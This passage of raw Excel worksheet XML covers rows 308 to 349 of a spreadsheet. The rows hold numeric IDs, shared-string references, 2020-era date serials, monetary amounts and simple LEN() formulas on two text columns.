      <c r="C308" t="s">
        <v>3060</v>
      </c>
      <c r="D308" t="s">
        <v>10999</v>
      </c>
      <c r="E308">
        <v>2</v>
      </c>
      <c r="F308" t="s">
        <v>1746</v>
      </c>
      <c r="G308" s="1">
        <v>44046</v>
      </c>
      <c r="H308">
        <v>720000</v>
      </c>
      <c r="J308" t="s">
        <v>11000</v>
      </c>
      <c r="K308">
        <f>LEN(I308)</f>
        <v>0</v>
      </c>
      <c r="L308">
        <f>LEN(J308)</f>
        <v>63</v>
      </c>
    </row>
    <row r="309" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A309">
        <v>20812</v>
      </c>
      <c r="B309">
        <v>841</v>
      </c>
      <c r="C309" t="s">
        <v>3060</v>
      </c>
      <c r="D309" t="s">
        <v>10999</v>
      </c>
      <c r="E309">
        <v>2</v>
      </c>
      <c r="F309" t="s">
        <v>11001</v>
      </c>
      <c r="G309" s="1">
        <v>44046</v>
      </c>
      <c r="H309">
        <v>720000</v>
      </c>
      <c r="J309" t="s">
        <v>11000</v>
      </c>
      <c r="K309">
        <f>LEN(I309)</f>
        <v>0</v>
      </c>
      <c r="L309">
        <f>LEN(J309)</f>
        <v>63</v>
      </c>
    </row>
    <row r="310" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A310">
        <v>21115</v>
      </c>
      <c r="B310">
        <v>946</v>
      </c>
      <c r="C310" t="s">
        <v>3143</v>
      </c>
      <c r="D310" t="s">
        <v>11148</v>
      </c>
      <c r="E310">
        <v>12</v>
      </c>
      <c r="F310" t="s">
        <v>9437</v>
      </c>
      <c r="G310" s="1">
        <v>44013</v>
      </c>
      <c r="H310">
        <v>193000</v>
      </c>
      <c r="J310" t="s">
        <v>9805</v>
      </c>
      <c r="K310">
        <f>LEN(I310)</f>
        <v>0</v>
      </c>
      <c r="L310">
        <f>LEN(J310)</f>
        <v>63</v>
      </c>
    </row>
    <row r="311" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A311">
        <v>21116</v>
      </c>
      <c r="B311">
        <v>946</v>
      </c>
      <c r="C311" t="s">
        <v>3143</v>
      </c>
      <c r="D311" t="s">
        <v>11148</v>
      </c>
      <c r="E311">
        <v>12</v>
      </c>
      <c r="F311" t="s">
        <v>11149</v>
      </c>
      <c r="G311" s="1">
        <v>44013</v>
      </c>
      <c r="H311">
        <v>100000</v>
      </c>
      <c r="J311" t="s">
        <v>9805</v>
      </c>
      <c r="K311">
        <f>LEN(I311)</f>
        <v>0</v>
      </c>
      <c r="L311">
        <f>LEN(J311)</f>
        <v>63</v>
      </c>
    </row>
    <row r="312" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A312">
        <v>21117</v>
      </c>
      <c r="B312">
        <v>946</v>
      </c>
      <c r="C312" t="s">
        <v>3143</v>
      </c>
      <c r="D312" t="s">
        <v>11148</v>
      </c>
      <c r="E312">
        <v>12</v>
      </c>
      <c r="F312" t="s">
        <v>11150</v>
      </c>
      <c r="G312" s="1">
        <v>44013</v>
      </c>
      <c r="H312">
        <v>100000</v>
      </c>
      <c r="J312" t="s">
        <v>9805</v>
      </c>
      <c r="K312">
        <f>LEN(I312)</f>
        <v>0</v>
      </c>
      <c r="L312">
        <f>LEN(J312)</f>
        <v>63</v>
      </c>
    </row>
    <row r="313" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A313">
        <v>21133</v>
      </c>
      <c r="B313">
        <v>925</v>
      </c>
      <c r="C313" t="s">
        <v>3133</v>
      </c>
      <c r="D313" t="s">
        <v>11162</v>
      </c>
      <c r="E313">
        <v>13</v>
      </c>
      <c r="F313" t="s">
        <v>9722</v>
      </c>
      <c r="G313" s="1">
        <v>44057</v>
      </c>
      <c r="H313">
        <v>20000</v>
      </c>
      <c r="J313" t="s">
        <v>9805</v>
      </c>
      <c r="K313">
        <f>LEN(I313)</f>
        <v>0</v>
      </c>
      <c r="L313">
        <f>LEN(J313)</f>
        <v>63</v>
      </c>
    </row>
    <row r="314" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A314">
        <v>21134</v>
      </c>
      <c r="B314">
        <v>925</v>
      </c>
      <c r="C314" t="s">
        <v>3133</v>
      </c>
      <c r="D314" t="s">
        <v>11162</v>
      </c>
      <c r="E314">
        <v>13</v>
      </c>
      <c r="F314" t="s">
        <v>9561</v>
      </c>
      <c r="G314" s="1">
        <v>44057</v>
      </c>
      <c r="H314">
        <v>19000</v>
      </c>
      <c r="J314" t="s">
        <v>9805</v>
      </c>
      <c r="K314">
        <f>LEN(I314)</f>
        <v>0</v>
      </c>
      <c r="L314">
        <f>LEN(J314)</f>
        <v>63</v>
      </c>
    </row>
    <row r="315" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A315">
        <v>19955</v>
      </c>
      <c r="B315">
        <v>206</v>
      </c>
      <c r="C315" t="s">
        <v>188</v>
      </c>
      <c r="D315" t="s">
        <v>10349</v>
      </c>
      <c r="E315">
        <v>31</v>
      </c>
      <c r="F315" t="s">
        <v>9437</v>
      </c>
      <c r="G315" s="1">
        <v>43986</v>
      </c>
      <c r="H315">
        <v>0</v>
      </c>
      <c r="I315" t="s">
        <v>9693</v>
      </c>
      <c r="J315" t="s">
        <v>10350</v>
      </c>
      <c r="K315">
        <f>LEN(I315)</f>
        <v>33</v>
      </c>
      <c r="L315">
        <f>LEN(J315)</f>
        <v>62</v>
      </c>
    </row>
    <row r="316" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A316">
        <v>20545</v>
      </c>
      <c r="B316">
        <v>640</v>
      </c>
      <c r="C316" t="s">
        <v>16293</v>
      </c>
      <c r="D316" t="s">
        <v>16294</v>
      </c>
      <c r="E316">
        <v>16</v>
      </c>
      <c r="F316" t="s">
        <v>10792</v>
      </c>
      <c r="G316" s="1">
        <v>43969</v>
      </c>
      <c r="H316" s="4">
        <v>700000</v>
      </c>
      <c r="I316" t="s">
        <v>9693</v>
      </c>
      <c r="J316" t="s">
        <v>10350</v>
      </c>
      <c r="K316">
        <f>LEN(I316)</f>
        <v>33</v>
      </c>
      <c r="L316">
        <f>LEN(J316)</f>
        <v>62</v>
      </c>
    </row>
    <row r="317" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A317">
        <v>20640</v>
      </c>
      <c r="B317">
        <v>520</v>
      </c>
      <c r="C317" t="s">
        <v>1123</v>
      </c>
      <c r="D317" t="s">
        <v>10863</v>
      </c>
      <c r="E317">
        <v>16</v>
      </c>
      <c r="F317" t="s">
        <v>609</v>
      </c>
      <c r="G317" s="1">
        <v>43980</v>
      </c>
      <c r="H317">
        <v>50000</v>
      </c>
      <c r="I317" t="s">
        <v>9738</v>
      </c>
      <c r="J317" t="s">
        <v>10872</v>
      </c>
      <c r="K317">
        <f>LEN(I317)</f>
        <v>18</v>
      </c>
      <c r="L317">
        <f>LEN(J317)</f>
        <v>62</v>
      </c>
    </row>
    <row r="318" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A318">
        <v>20566</v>
      </c>
      <c r="B318">
        <v>2769</v>
      </c>
      <c r="C318" t="s">
        <v>6962</v>
      </c>
      <c r="D318" t="s">
        <v>10816</v>
      </c>
      <c r="E318">
        <v>25</v>
      </c>
      <c r="F318" t="s">
        <v>1746</v>
      </c>
      <c r="G318" s="1">
        <v>43959</v>
      </c>
      <c r="H318">
        <v>0</v>
      </c>
      <c r="I318" t="s">
        <v>9536</v>
      </c>
      <c r="J318" t="s">
        <v>10350</v>
      </c>
      <c r="K318">
        <f>LEN(I318)</f>
        <v>13</v>
      </c>
      <c r="L318">
        <f>LEN(J318)</f>
        <v>62</v>
      </c>
    </row>
    <row r="319" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A319">
        <v>19507</v>
      </c>
      <c r="B319">
        <v>233</v>
      </c>
      <c r="C319" t="s">
        <v>421</v>
      </c>
      <c r="D319" t="s">
        <v>10086</v>
      </c>
      <c r="E319">
        <v>16</v>
      </c>
      <c r="F319" t="s">
        <v>9795</v>
      </c>
      <c r="G319" s="1">
        <v>43938</v>
      </c>
      <c r="H319">
        <v>0</v>
      </c>
      <c r="J319" t="s">
        <v>10087</v>
      </c>
      <c r="K319">
        <f>LEN(I319)</f>
        <v>0</v>
      </c>
      <c r="L319">
        <f>LEN(J319)</f>
        <v>62</v>
      </c>
    </row>
    <row r="320" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A320">
        <v>20054</v>
      </c>
      <c r="B320">
        <v>2669</v>
      </c>
      <c r="C320" t="s">
        <v>5588</v>
      </c>
      <c r="D320" t="s">
        <v>10434</v>
      </c>
      <c r="E320">
        <v>12</v>
      </c>
      <c r="F320" t="s">
        <v>9437</v>
      </c>
      <c r="G320" s="1">
        <v>43928</v>
      </c>
      <c r="H320">
        <v>2380</v>
      </c>
      <c r="J320" t="s">
        <v>10445</v>
      </c>
      <c r="K320">
        <f>LEN(I320)</f>
        <v>0</v>
      </c>
      <c r="L320">
        <f>LEN(J320)</f>
        <v>62</v>
      </c>
    </row>
    <row r="321" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A321">
        <v>20788</v>
      </c>
      <c r="B321">
        <v>625</v>
      </c>
      <c r="C321" t="s">
        <v>1053</v>
      </c>
      <c r="D321" t="s">
        <v>10980</v>
      </c>
      <c r="E321">
        <v>17</v>
      </c>
      <c r="F321" t="s">
        <v>10982</v>
      </c>
      <c r="G321" s="1">
        <v>43994</v>
      </c>
      <c r="H321">
        <v>519769</v>
      </c>
      <c r="I321" t="s">
        <v>10981</v>
      </c>
      <c r="J321" t="s">
        <v>10983</v>
      </c>
      <c r="K321">
        <f>LEN(I321)</f>
        <v>190</v>
      </c>
      <c r="L321">
        <f>LEN(J321)</f>
        <v>61</v>
      </c>
    </row>
    <row r="322" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A322">
        <v>19631</v>
      </c>
      <c r="B322">
        <v>686</v>
      </c>
      <c r="C322" t="s">
        <v>16299</v>
      </c>
      <c r="D322" t="s">
        <v>16300</v>
      </c>
      <c r="E322">
        <v>1</v>
      </c>
      <c r="F322" t="s">
        <v>10144</v>
      </c>
      <c r="G322" s="1">
        <v>43871</v>
      </c>
      <c r="H322" s="4">
        <v>100000</v>
      </c>
      <c r="I322" t="s">
        <v>10145</v>
      </c>
      <c r="J322" t="s">
        <v>10146</v>
      </c>
      <c r="K322">
        <f>LEN(I322)</f>
        <v>85</v>
      </c>
      <c r="L322">
        <f>LEN(J322)</f>
        <v>61</v>
      </c>
    </row>
    <row r="323" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A323">
        <v>19842</v>
      </c>
      <c r="B323">
        <v>1813</v>
      </c>
      <c r="C323" t="s">
        <v>5441</v>
      </c>
      <c r="D323" t="s">
        <v>10278</v>
      </c>
      <c r="E323">
        <v>11</v>
      </c>
      <c r="F323" t="s">
        <v>9561</v>
      </c>
      <c r="G323" s="1">
        <v>43977</v>
      </c>
      <c r="H323">
        <v>10000</v>
      </c>
      <c r="I323" t="s">
        <v>9660</v>
      </c>
      <c r="J323" t="s">
        <v>10279</v>
      </c>
      <c r="K323">
        <f>LEN(I323)</f>
        <v>16</v>
      </c>
      <c r="L323">
        <f>LEN(J323)</f>
        <v>61</v>
      </c>
    </row>
    <row r="324" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A324">
        <v>20735</v>
      </c>
      <c r="B324">
        <v>862</v>
      </c>
      <c r="C324" t="s">
        <v>3051</v>
      </c>
      <c r="D324" t="s">
        <v>10942</v>
      </c>
      <c r="E324">
        <v>2</v>
      </c>
      <c r="F324" t="s">
        <v>673</v>
      </c>
      <c r="G324" s="1">
        <v>43990</v>
      </c>
      <c r="H324">
        <v>200000</v>
      </c>
      <c r="J324" t="s">
        <v>10944</v>
      </c>
      <c r="K324">
        <f>LEN(I324)</f>
        <v>0</v>
      </c>
      <c r="L324">
        <f>LEN(J324)</f>
        <v>61</v>
      </c>
    </row>
    <row r="325" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A325">
        <v>20786</v>
      </c>
      <c r="B325">
        <v>625</v>
      </c>
      <c r="C325" t="s">
        <v>1053</v>
      </c>
      <c r="D325" t="s">
        <v>10980</v>
      </c>
      <c r="E325">
        <v>17</v>
      </c>
      <c r="F325" t="s">
        <v>945</v>
      </c>
      <c r="G325" s="1">
        <v>43994</v>
      </c>
      <c r="H325">
        <v>2440774</v>
      </c>
      <c r="I325" t="s">
        <v>10981</v>
      </c>
      <c r="J325" t="s">
        <v>10936</v>
      </c>
      <c r="K325">
        <f>LEN(I325)</f>
        <v>190</v>
      </c>
      <c r="L325">
        <f>LEN(J325)</f>
        <v>60</v>
      </c>
    </row>
    <row r="326" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A326">
        <v>19899</v>
      </c>
      <c r="B326">
        <v>2641</v>
      </c>
      <c r="C326" t="s">
        <v>5471</v>
      </c>
      <c r="D326" t="s">
        <v>10311</v>
      </c>
      <c r="E326">
        <v>21</v>
      </c>
      <c r="F326" t="s">
        <v>1746</v>
      </c>
      <c r="G326" s="1">
        <v>44070</v>
      </c>
      <c r="H326">
        <v>55000</v>
      </c>
      <c r="I326" t="s">
        <v>10312</v>
      </c>
      <c r="J326" t="s">
        <v>10313</v>
      </c>
      <c r="K326">
        <f>LEN(I326)</f>
        <v>114</v>
      </c>
      <c r="L326">
        <f>LEN(J326)</f>
        <v>60</v>
      </c>
    </row>
    <row r="327" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A327">
        <v>19367</v>
      </c>
      <c r="B327">
        <v>610</v>
      </c>
      <c r="C327" t="s">
        <v>327</v>
      </c>
      <c r="D327" t="s">
        <v>9969</v>
      </c>
      <c r="E327">
        <v>26</v>
      </c>
      <c r="F327" t="s">
        <v>2236</v>
      </c>
      <c r="G327" s="1">
        <v>43923</v>
      </c>
      <c r="H327">
        <v>600000</v>
      </c>
      <c r="I327" t="s">
        <v>9970</v>
      </c>
      <c r="J327" t="s">
        <v>9971</v>
      </c>
      <c r="K327">
        <f>LEN(I327)</f>
        <v>46</v>
      </c>
      <c r="L327">
        <f>LEN(J327)</f>
        <v>60</v>
      </c>
    </row>
    <row r="328" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A328">
        <v>20724</v>
      </c>
      <c r="B328">
        <v>2332</v>
      </c>
      <c r="C328" t="s">
        <v>5974</v>
      </c>
      <c r="D328" t="s">
        <v>9594</v>
      </c>
      <c r="E328">
        <v>13</v>
      </c>
      <c r="F328" t="s">
        <v>9846</v>
      </c>
      <c r="G328" s="1">
        <v>44000</v>
      </c>
      <c r="H328">
        <v>50000</v>
      </c>
      <c r="I328" t="s">
        <v>10935</v>
      </c>
      <c r="J328" t="s">
        <v>10936</v>
      </c>
      <c r="K328">
        <f>LEN(I328)</f>
        <v>38</v>
      </c>
      <c r="L328">
        <f>LEN(J328)</f>
        <v>60</v>
      </c>
    </row>
    <row r="329" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A329">
        <v>20340</v>
      </c>
      <c r="B329">
        <v>796</v>
      </c>
      <c r="C329" t="s">
        <v>467</v>
      </c>
      <c r="D329" t="s">
        <v>9770</v>
      </c>
      <c r="E329">
        <v>2</v>
      </c>
      <c r="F329" t="s">
        <v>10089</v>
      </c>
      <c r="G329" s="1">
        <v>43997</v>
      </c>
      <c r="H329">
        <v>400000</v>
      </c>
      <c r="J329" t="s">
        <v>10640</v>
      </c>
      <c r="K329">
        <f>LEN(I329)</f>
        <v>0</v>
      </c>
      <c r="L329">
        <f>LEN(J329)</f>
        <v>60</v>
      </c>
    </row>
    <row r="330" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A330">
        <v>20200</v>
      </c>
      <c r="B330">
        <v>2701</v>
      </c>
      <c r="C330" t="s">
        <v>16301</v>
      </c>
      <c r="D330" t="s">
        <v>16302</v>
      </c>
      <c r="E330">
        <v>12</v>
      </c>
      <c r="F330" t="s">
        <v>9437</v>
      </c>
      <c r="G330" s="1">
        <v>43964</v>
      </c>
      <c r="H330" s="4">
        <v>8400000</v>
      </c>
      <c r="I330" t="s">
        <v>10546</v>
      </c>
      <c r="J330" t="s">
        <v>10547</v>
      </c>
      <c r="K330">
        <f>LEN(I330)</f>
        <v>38</v>
      </c>
      <c r="L330">
        <f>LEN(J330)</f>
        <v>59</v>
      </c>
    </row>
    <row r="331" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A331">
        <v>16886</v>
      </c>
      <c r="B331">
        <v>181</v>
      </c>
      <c r="C331" t="s">
        <v>149</v>
      </c>
      <c r="D331" t="s">
        <v>9547</v>
      </c>
      <c r="E331">
        <v>12</v>
      </c>
      <c r="F331" t="s">
        <v>9437</v>
      </c>
      <c r="G331" s="1">
        <v>43964</v>
      </c>
      <c r="H331">
        <v>0</v>
      </c>
      <c r="J331" t="s">
        <v>9548</v>
      </c>
      <c r="K331">
        <f>LEN(I331)</f>
        <v>0</v>
      </c>
      <c r="L331">
        <f>LEN(J331)</f>
        <v>59</v>
      </c>
    </row>
    <row r="332" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A332">
        <v>20632</v>
      </c>
      <c r="B332">
        <v>768</v>
      </c>
      <c r="C332" t="s">
        <v>1113</v>
      </c>
      <c r="D332" t="s">
        <v>10856</v>
      </c>
      <c r="E332">
        <v>16</v>
      </c>
      <c r="F332" t="s">
        <v>609</v>
      </c>
      <c r="G332" s="1">
        <v>44032</v>
      </c>
      <c r="H332">
        <v>525</v>
      </c>
      <c r="I332" t="s">
        <v>9485</v>
      </c>
      <c r="J332" t="s">
        <v>10861</v>
      </c>
      <c r="K332">
        <f>LEN(I332)</f>
        <v>18</v>
      </c>
      <c r="L332">
        <f>LEN(J332)</f>
        <v>58</v>
      </c>
    </row>
    <row r="333" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A333">
        <v>19712</v>
      </c>
      <c r="B333">
        <v>1536</v>
      </c>
      <c r="C333" t="s">
        <v>2718</v>
      </c>
      <c r="D333" t="s">
        <v>10126</v>
      </c>
      <c r="E333">
        <v>14</v>
      </c>
      <c r="F333" t="s">
        <v>10195</v>
      </c>
      <c r="G333" s="1">
        <v>43908</v>
      </c>
      <c r="H333">
        <v>500000</v>
      </c>
      <c r="J333" t="s">
        <v>10196</v>
      </c>
      <c r="K333">
        <f>LEN(I333)</f>
        <v>0</v>
      </c>
      <c r="L333">
        <f>LEN(J333)</f>
        <v>58</v>
      </c>
    </row>
    <row r="334" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A334">
        <v>19713</v>
      </c>
      <c r="B334">
        <v>1536</v>
      </c>
      <c r="C334" t="s">
        <v>2718</v>
      </c>
      <c r="D334" t="s">
        <v>10126</v>
      </c>
      <c r="E334">
        <v>14</v>
      </c>
      <c r="F334" t="s">
        <v>9437</v>
      </c>
      <c r="G334" s="1">
        <v>43908</v>
      </c>
      <c r="H334">
        <v>500000</v>
      </c>
      <c r="J334" t="s">
        <v>10196</v>
      </c>
      <c r="K334">
        <f>LEN(I334)</f>
        <v>0</v>
      </c>
      <c r="L334">
        <f>LEN(J334)</f>
        <v>58</v>
      </c>
    </row>
    <row r="335" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A335">
        <v>19714</v>
      </c>
      <c r="B335">
        <v>1536</v>
      </c>
      <c r="C335" t="s">
        <v>2718</v>
      </c>
      <c r="D335" t="s">
        <v>10126</v>
      </c>
      <c r="E335">
        <v>14</v>
      </c>
      <c r="F335" t="s">
        <v>10197</v>
      </c>
      <c r="G335" s="1">
        <v>43908</v>
      </c>
      <c r="H335">
        <v>100000</v>
      </c>
      <c r="J335" t="s">
        <v>10196</v>
      </c>
      <c r="K335">
        <f>LEN(I335)</f>
        <v>0</v>
      </c>
      <c r="L335">
        <f>LEN(J335)</f>
        <v>58</v>
      </c>
    </row>
    <row r="336" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A336">
        <v>20132</v>
      </c>
      <c r="B336">
        <v>2610</v>
      </c>
      <c r="C336" t="s">
        <v>5637</v>
      </c>
      <c r="D336" t="s">
        <v>10495</v>
      </c>
      <c r="E336">
        <v>2</v>
      </c>
      <c r="F336" t="s">
        <v>9466</v>
      </c>
      <c r="G336" s="1">
        <v>43914</v>
      </c>
      <c r="H336">
        <v>100000</v>
      </c>
      <c r="J336" t="s">
        <v>10498</v>
      </c>
      <c r="K336">
        <f>LEN(I336)</f>
        <v>0</v>
      </c>
      <c r="L336">
        <f>LEN(J336)</f>
        <v>57</v>
      </c>
    </row>
    <row r="337" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A337">
        <v>20549</v>
      </c>
      <c r="B337">
        <v>1973</v>
      </c>
      <c r="C337" t="s">
        <v>5826</v>
      </c>
      <c r="D337" t="s">
        <v>10796</v>
      </c>
      <c r="E337">
        <v>16</v>
      </c>
      <c r="F337" t="s">
        <v>10797</v>
      </c>
      <c r="G337" s="1">
        <v>44067</v>
      </c>
      <c r="H337">
        <v>1000000</v>
      </c>
      <c r="J337" t="s">
        <v>10798</v>
      </c>
      <c r="K337">
        <f>LEN(I337)</f>
        <v>0</v>
      </c>
      <c r="L337">
        <f>LEN(J337)</f>
        <v>57</v>
      </c>
    </row>
    <row r="338" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A338">
        <v>20470</v>
      </c>
      <c r="B338">
        <v>2555</v>
      </c>
      <c r="C338" t="s">
        <v>5007</v>
      </c>
      <c r="D338" t="s">
        <v>10740</v>
      </c>
      <c r="E338">
        <v>31</v>
      </c>
      <c r="F338" t="s">
        <v>10004</v>
      </c>
      <c r="G338" s="1">
        <v>43948</v>
      </c>
      <c r="H338">
        <v>1000000</v>
      </c>
      <c r="I338" t="s">
        <v>10010</v>
      </c>
      <c r="J338" t="s">
        <v>10741</v>
      </c>
      <c r="K338">
        <f>LEN(I338)</f>
        <v>33</v>
      </c>
      <c r="L338">
        <f>LEN(J338)</f>
        <v>56</v>
      </c>
    </row>
    <row r="339" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A339">
        <v>20324</v>
      </c>
      <c r="B339">
        <v>683</v>
      </c>
      <c r="C339" t="s">
        <v>46</v>
      </c>
      <c r="D339" t="s">
        <v>10626</v>
      </c>
      <c r="E339">
        <v>2</v>
      </c>
      <c r="F339" t="s">
        <v>5434</v>
      </c>
      <c r="G339" s="1">
        <v>43942</v>
      </c>
      <c r="H339">
        <v>2000</v>
      </c>
      <c r="I339" t="s">
        <v>9952</v>
      </c>
      <c r="J339" t="s">
        <v>10627</v>
      </c>
      <c r="K339">
        <f>LEN(I339)</f>
        <v>18</v>
      </c>
      <c r="L339">
        <f>LEN(J339)</f>
        <v>56</v>
      </c>
    </row>
    <row r="340" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A340">
        <v>20807</v>
      </c>
      <c r="B340">
        <v>2368</v>
      </c>
      <c r="C340" t="s">
        <v>6056</v>
      </c>
      <c r="D340" t="s">
        <v>10993</v>
      </c>
      <c r="E340">
        <v>12</v>
      </c>
      <c r="F340" t="s">
        <v>9437</v>
      </c>
      <c r="G340" s="1">
        <v>44018</v>
      </c>
      <c r="H340">
        <v>100</v>
      </c>
      <c r="I340" t="s">
        <v>9550</v>
      </c>
      <c r="J340" t="s">
        <v>10627</v>
      </c>
      <c r="K340">
        <f>LEN(I340)</f>
        <v>18</v>
      </c>
      <c r="L340">
        <f>LEN(J340)</f>
        <v>56</v>
      </c>
    </row>
    <row r="341" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A341">
        <v>19395</v>
      </c>
      <c r="B341">
        <v>2558</v>
      </c>
      <c r="C341" t="s">
        <v>4971</v>
      </c>
      <c r="D341" t="s">
        <v>10001</v>
      </c>
      <c r="E341">
        <v>12</v>
      </c>
      <c r="F341" t="s">
        <v>609</v>
      </c>
      <c r="G341" s="1">
        <v>43868</v>
      </c>
      <c r="H341">
        <v>100000</v>
      </c>
      <c r="J341" t="s">
        <v>10002</v>
      </c>
      <c r="K341">
        <f>LEN(I341)</f>
        <v>0</v>
      </c>
      <c r="L341">
        <f>LEN(J341)</f>
        <v>56</v>
      </c>
    </row>
    <row r="342" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A342">
        <v>19396</v>
      </c>
      <c r="B342">
        <v>2558</v>
      </c>
      <c r="C342" t="s">
        <v>4971</v>
      </c>
      <c r="D342" t="s">
        <v>10001</v>
      </c>
      <c r="E342">
        <v>12</v>
      </c>
      <c r="F342" t="s">
        <v>9681</v>
      </c>
      <c r="G342" s="1">
        <v>43868</v>
      </c>
      <c r="H342">
        <v>10000</v>
      </c>
      <c r="J342" t="s">
        <v>10002</v>
      </c>
      <c r="K342">
        <f>LEN(I342)</f>
        <v>0</v>
      </c>
      <c r="L342">
        <f>LEN(J342)</f>
        <v>56</v>
      </c>
    </row>
    <row r="343" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A343">
        <v>19999</v>
      </c>
      <c r="B343">
        <v>500</v>
      </c>
      <c r="C343" t="s">
        <v>625</v>
      </c>
      <c r="D343" t="s">
        <v>9803</v>
      </c>
      <c r="E343">
        <v>11</v>
      </c>
      <c r="F343" t="s">
        <v>3204</v>
      </c>
      <c r="G343" s="1">
        <v>43978</v>
      </c>
      <c r="H343">
        <v>10000</v>
      </c>
      <c r="J343" t="s">
        <v>10391</v>
      </c>
      <c r="K343">
        <f>LEN(I343)</f>
        <v>0</v>
      </c>
      <c r="L343">
        <f>LEN(J343)</f>
        <v>56</v>
      </c>
    </row>
    <row r="344" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A344">
        <v>17006</v>
      </c>
      <c r="B344">
        <v>2295</v>
      </c>
      <c r="C344" t="s">
        <v>4913</v>
      </c>
      <c r="D344" t="s">
        <v>9609</v>
      </c>
      <c r="E344">
        <v>2</v>
      </c>
      <c r="F344" t="s">
        <v>9610</v>
      </c>
      <c r="G344" s="1">
        <v>43900</v>
      </c>
      <c r="H344">
        <v>100000</v>
      </c>
      <c r="I344" t="s">
        <v>9611</v>
      </c>
      <c r="J344" t="s">
        <v>9612</v>
      </c>
      <c r="K344">
        <f>LEN(I344)</f>
        <v>127</v>
      </c>
      <c r="L344">
        <f>LEN(J344)</f>
        <v>55</v>
      </c>
    </row>
    <row r="345" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A345">
        <v>21357</v>
      </c>
      <c r="B345">
        <v>427</v>
      </c>
      <c r="C345" t="s">
        <v>1619</v>
      </c>
      <c r="D345" t="s">
        <v>11325</v>
      </c>
      <c r="E345">
        <v>12</v>
      </c>
      <c r="F345" t="s">
        <v>11027</v>
      </c>
      <c r="G345" s="1">
        <v>44116</v>
      </c>
      <c r="H345">
        <v>20000</v>
      </c>
      <c r="I345" t="s">
        <v>11326</v>
      </c>
      <c r="J345" t="s">
        <v>10793</v>
      </c>
      <c r="K345">
        <f>LEN(I345)</f>
        <v>79</v>
      </c>
      <c r="L345">
        <f>LEN(J345)</f>
        <v>55</v>
      </c>
    </row>
    <row r="346" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A346">
        <v>20434</v>
      </c>
      <c r="B346">
        <v>2600</v>
      </c>
      <c r="C346" t="s">
        <v>4419</v>
      </c>
      <c r="D346" t="s">
        <v>10707</v>
      </c>
      <c r="E346">
        <v>14</v>
      </c>
      <c r="F346" t="s">
        <v>10709</v>
      </c>
      <c r="G346" s="1">
        <v>44299</v>
      </c>
      <c r="H346">
        <v>1203848</v>
      </c>
      <c r="I346" t="s">
        <v>10710</v>
      </c>
      <c r="J346" t="s">
        <v>10711</v>
      </c>
      <c r="K346">
        <f>LEN(I346)</f>
        <v>59</v>
      </c>
      <c r="L346">
        <f>LEN(J346)</f>
        <v>55</v>
      </c>
    </row>
    <row r="347" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A347">
        <v>17009</v>
      </c>
      <c r="B347">
        <v>2295</v>
      </c>
      <c r="C347" t="s">
        <v>4913</v>
      </c>
      <c r="D347" t="s">
        <v>9609</v>
      </c>
      <c r="E347">
        <v>2</v>
      </c>
      <c r="F347" t="s">
        <v>9615</v>
      </c>
      <c r="G347" s="1">
        <v>43900</v>
      </c>
      <c r="H347">
        <v>100000</v>
      </c>
      <c r="I347" t="s">
        <v>9616</v>
      </c>
      <c r="J347" t="s">
        <v>9612</v>
      </c>
      <c r="K347">
        <f>LEN(I347)</f>
        <v>48</v>
      </c>
      <c r="L347">
        <f>LEN(J347)</f>
        <v>55</v>
      </c>
    </row>
    <row r="348" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A348">
        <v>21327</v>
      </c>
      <c r="B348">
        <v>4798</v>
      </c>
      <c r="C348" t="s">
        <v>7183</v>
      </c>
      <c r="D348" t="s">
        <v>11310</v>
      </c>
      <c r="E348">
        <v>11</v>
      </c>
      <c r="F348" t="s">
        <v>11265</v>
      </c>
      <c r="G348" s="1">
        <v>44034</v>
      </c>
      <c r="H348">
        <v>50000</v>
      </c>
      <c r="I348" t="s">
        <v>11311</v>
      </c>
      <c r="J348" t="s">
        <v>10793</v>
      </c>
      <c r="K348">
        <f>LEN(I348)</f>
        <v>39</v>
      </c>
      <c r="L348">
        <f>LEN(J348)</f>
        <v>55</v>
      </c>
    </row>
    <row r="349" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A349">
        <v>17008</v>
      </c>
      <c r="B349">
        <v>2295</v>
      </c>
      <c r="C349" t="s">
        <v>4913</v>
      </c>
      <c r="D349" t="s">
        <v>9609</v>
      </c>
      <c r="E349">
        <v>2</v>
      </c>
      <c r="F349" t="s">
        <v>9613</v>
      </c>
      <c r="G349" s="1">
        <v>43900</v>
      </c>
      <c r="H349">
        <v>100000</v>
      </c>
      <c r="I349" t="s">
        <v>9614</v>
      </c>
      <c r="J349" t="s">
        <v>9612</v>
      </c>
      <c r="K349">
        <f>LEN(I349)</f>
        <v>36</v>
